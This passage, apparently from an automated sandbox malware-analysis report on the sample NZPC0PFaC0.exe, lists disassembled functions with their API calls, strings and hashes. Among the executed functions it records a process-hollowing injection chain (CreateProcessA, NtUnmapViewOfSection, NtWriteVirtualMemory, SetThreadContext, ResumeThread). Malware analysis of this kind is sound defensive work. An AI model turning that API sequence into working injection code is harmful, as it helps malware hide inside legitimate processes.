                                                                                        • Part of subcall function 00427CEC: _doexit.LIBCMT ref: 00427CF6
                                                                                      • _doexit.LIBCMT ref: 00427C50
                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EE4
                                                                                        • Part of subcall function 00427E0E: __initterm.LIBCMT ref: 00427EF5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$Decode$Encode__initterm_doexit$FileMessageModuleName___crt__lock
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2447380256-472376889
                                                                                      • Opcode ID: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                      • Instruction ID: 2444216041853f974cc06d1078168a6e61cf6443a39b7242863de3565bbad4eb
                                                                                      • Opcode Fuzzy Hash: 153482db97bfda71f73a9d163006c74db99129bc5c403b59fea0bac6b8996c12
                                                                                      • Instruction Fuzzy Hash: 0CC0122079C31826E9513362FD43B5832065B00B08FD2002ABB081D4C2E9CA5594409A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ECB0, Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove_strtok
                                                                                      • String ID:
                                                                                      • API String ID: 3446180046-0
                                                                                      • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                                                                      • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                                                                      • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00422130, Relevance: 6.2, APIs: 4, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 2974526305-0
                                                                                      • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                                                                                      • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                                                                                      • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0043C677, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                      • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                                                                                      • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                                                                                      • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040F0E0, Relevance: 6.1, APIs: 4, Instructions: 86filestringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                      • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                      • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$CloseCreateHandleWritelstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 1421093161-0
                                                                                      • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                                                                                      • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                                                                                      • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004127A0, Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32 ref: 004127B9
                                                                                      • _malloc.LIBCMT ref: 004127C3
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _memset.LIBCMT ref: 004127CE
                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2824100046-0
                                                                                      • Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                      • Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
                                                                                      • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00414920, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                      • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                      • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00417D50, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                      • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                      • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                      • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004516A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .\crypto\err\err.c$unknown
                                                                                      • API String ID: 0-565200744
                                                                                      • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                      • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                      • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00424168, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0042419D
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DebuggerPresent_memset
                                                                                      • String ID: i;B
                                                                                      • API String ID: 2328436684-472376889
                                                                                      • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                      • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                      • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0042A77E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                      • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                      • String ID: 8Q
                                                                                      • API String ID: 3761405300-2096853525
                                                                                      • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                      • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                      • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00413C40, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                        • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                      • _memset.LIBCMT ref: 00413C83
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                      • String ID: vector<T> too long
                                                                                      • API String ID: 1327501947-3788999226
                                                                                      • Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                      • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                      • Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
                                                                                      • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00480620, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00480686
                                                                                        • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                      Strings
                                                                                      • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                      • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset_raise
                                                                                      • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                      • API String ID: 1484197835-3867593797
                                                                                      • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                      • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                      • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004242A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
                                                                                      • __invoke_watson.LIBCMT ref: 004242CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DecodePointer__invoke_watson
                                                                                      • String ID: i;B
                                                                                      • API String ID: 4034010525-472376889
                                                                                      • Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                      • Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
                                                                                      • Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
                                                                                      • Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0044F23E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0044F251
                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                      • String ID: TeM
                                                                                      • API String ID: 757275642-2215902641
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: NZPC0PFaC0.exe PID: 5344 Parent PID: 752 NZPC0PFaC0.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 007C0110, Relevance: 22.7, APIs: 15, Instructions: 248memorynativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 007C0156
                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 007C016C
                                                                                      • CreateProcessA.KERNELBASE(?,00000000), ref: 007C0255
                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007C0270
                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007C0283
                                                                                      • GetThreadContext.KERNELBASE(00000000,?), ref: 007C029F
                                                                                      • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007C02C8
                                                                                      • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007C02E3
                                                                                      • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 007C0304
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 007C032A
                                                                                      • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 007C0399
                                                                                      • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007C03BF
                                                                                      • SetThreadContext.KERNELBASE(00000000,?), ref: 007C03E1
                                                                                      • ResumeThread.KERNELBASE(00000000), ref: 007C03ED
                                                                                      • ExitProcess.KERNEL32(00000000), ref: 007C0412
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                      • String ID:
                                                                                      • API String ID: 2875986403-0
                                                                                      • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction ID: 4a24ccb8013459170615a5ca1fac6853b2334675bcbdeacffc5a615d32749a58
                                                                                      • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                      • Instruction Fuzzy Hash: 30B1B674A00208EFDB44CF98C895F9EBBB5BF88314F248158E509AB391D775AE41CF94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007C0630, Relevance: 58.4, APIs: 1, Strings: 32, Instructions: 671libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(user32), ref: 007C06E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
                                                                                      • API String ID: 1029625771-3105132389
                                                                                      • Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction ID: 9cb2ad3676cc008af11d43fc5a0787a0f2ad3af0172fa02dad973dfbf389bae2
                                                                                      • Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
                                                                                      • Instruction Fuzzy Hash: B6A24460D0C6E8CDEB21C668CC4C7DDBEB51B26749F0841D9858C66292C7BB1B98CF76
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007C0420, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 007C0533
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateWindow
                                                                                      • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                      • API String ID: 716092398-2341455598
                                                                                      • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction ID: 5d9b2f0f91b5198a19d247993f43767eea540c5b7cfd9527319795bcae2398a2
                                                                                      • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                      • Instruction Fuzzy Hash: C1510870D08388DBEB11CB98D849BEDBFB26F11708F14405CD5446F286C3BA5669CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 007C05B0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007C05EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: apfHQ$o
                                                                                      • API String ID: 3188754299-2999369273
                                                                                      • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction ID: 5e224ea3a883615b4e56b37105faf11a118fa16a4c7dcc08dea4b02b14f4b70a
                                                                                      • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                      • Instruction Fuzzy Hash: 54011E70C0424CEADB14DFA8C5187AEBFB5AF41308F14809DC4192B242D77A9B58CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 007E84AB, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
